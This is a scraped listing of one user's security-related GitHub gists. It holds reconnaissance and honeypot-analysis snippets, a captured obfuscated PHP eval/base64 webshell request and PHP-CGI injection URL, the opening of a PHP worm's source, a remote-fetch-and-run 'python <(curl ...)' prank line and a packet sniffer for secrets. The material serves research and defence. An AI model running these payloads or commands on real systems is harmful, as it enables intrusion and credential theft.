@dustyfresh
dustyfresh / unlockedws.py
Last active April 20, 2016 16:23
Run this when you find an unlocked OS X workstation
#!/usr/bin/python
# This is a friendly reminder that you should lock your computer.
#
# Moves mouse cursor to random location and taunts the unsuspecting user
#
#
# Run like ninja:
# python <(curl -s https://gist.githubusercontent.com/dustyfresh/2b836ff3a207fc02f50105f5902db2f4/raw/91354fcb70b63fbd6eebf92da9dcd1608560729e/unlockedws.py) &
#
# <@dustyfresh>
@dustyfresh
dustyfresh / fierce.pl
Created April 24, 2016 00:43
RSnake's fierce.pl DNS enumeration & zone transfer script
#!/usr/bin/perl
#########################################
# Fierce v1.0.3 - Beta 03/23/2008
# By RSnake http://ha.ckers.org/fierce/
# Threading by IceShaman
# Zone transfer and additional patches by Jabra
#########################################
use strict; #warnings off after testing
#!/usr/bin/env python
# Thanks to PaulSec! (https://github.com/PaulSec/API-dnsdumpster.com)
import json
import argparse
from DNSDumpsterAPI import DNSDumpsterAPI

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='dnsdumpster CLI client')
    parser.add_argument('--domain', '-d', type=str, required=True, help='domain name to check')
    args = parser.parse_args()
@dustyfresh
dustyfresh / honeypress-payload-1.md
Last active February 15, 2018 15:22
analysis of one of the first payloads caught by HoneyPress

Interesting payload:

195.154.183.187 - - [12/Jun/2016 18:46:03] "coco=%40eval%2f**%2f(%24%7b%27_P%27.%27OST%27%7d%5bz9%5d%2f**%2f(%24%7b%27_POS%27.%27T%27%7d%5bz0%5d))%3b&z9=BaSE64_dEcOdE&z0=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%3d&z2=393839303030300D0A3C3F706870200D0A246D756A6A203D20245F504F53545B277A275D3B2069662028246D756A6A213D222229207B202478737365723D62

@dustyfresh

PHP Worm

This worm seems to be defunct now: the C&C servers that this code references (over HTTP) no longer appear to respond.

<?php
// Read the list of functions PHP has been configured to disable
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
    $disablefunc = str_replace(" ","",$disablefunc);
@dustyfresh
dustyfresh / checkTor.py
Created June 17, 2016 15:37
Check if an IP address is a Tor exit node or not. Requires the requests module.
#!/usr/bin/env python
import requests
import re

def checkTor(ip):
    # Fetch the exit-node list published by the Tor Project
    headers = {'user-agent': 'checkTor'}
    exit_nodes = requests.get('https://check.torproject.org/exit-addresses', headers=headers)
    exit_nodes = exit_nodes.text
    # re.escape so the dots in the address match literally instead of as regex wildcards
    if re.search(re.escape(ip), exit_nodes):
        return True
    return False
@dustyfresh
dustyfresh / honeypress-payload-3.md
Created June 22, 2016 16:34
linksys RCE botnet payload caught by HoneyPress

Payload found to be unrelated to WordPress. It seems to be trying to build a botnet by exploiting Linksys E-Series routers.

> db.payloads.find({'ip': '179.158.120.213'}).pretty()
{
        "_id" : ObjectId("576a421f83932a00168098be"),
        "Tor" : false,
        "ip" : "179.158.120.213",
        "user-agent" : "Wget(linux)",
        "triggered_url" : "http://178.62.224.8/hndUnblock.cgi",

Payload

> db.payloads.find({ip: '176.94.194.90'}).pretty()
{
	"_id" : ObjectId("577f2c88247fe0000e2831a8"),
	"Tor" : false,
	"ip" : "176.94.194.90",
	"user-agent" : "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
	"triggered_url" : "http://178.62.224.8/phppath/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D\"\"+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-n",
	"time" : "1467952264",
@dustyfresh
dustyfresh / do_not_scan.txt
Created October 7, 2016 13:34
textfile of ipv4 ranges to exclude from port scanning
# Martian ranges
0.0.0.0/8
10.0.0.0/8
100.64.0.0/10
127.0.0.0/8
127.0.53.53
169.254.0.0/16
172.16.0.0/12
192.0.0.0/24
192.0.2.0/24
@dustyfresh
dustyfresh / sniff-example.py
Last active March 26, 2020 17:25
Sniff packets for secrets with python scapy
#!/usr/bin/env python3
from scapy.all import *
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import re

def packet_callback(packet):
    # Guard against non-TCP frames, which would otherwise raise on packet[TCP]
    if packet.haslayer(TCP) and packet[TCP].payload:
        pkt = str(packet[TCP].payload)
        if packet[IP].dport == 80:
            pass  # remainder of the callback is not shown in this preview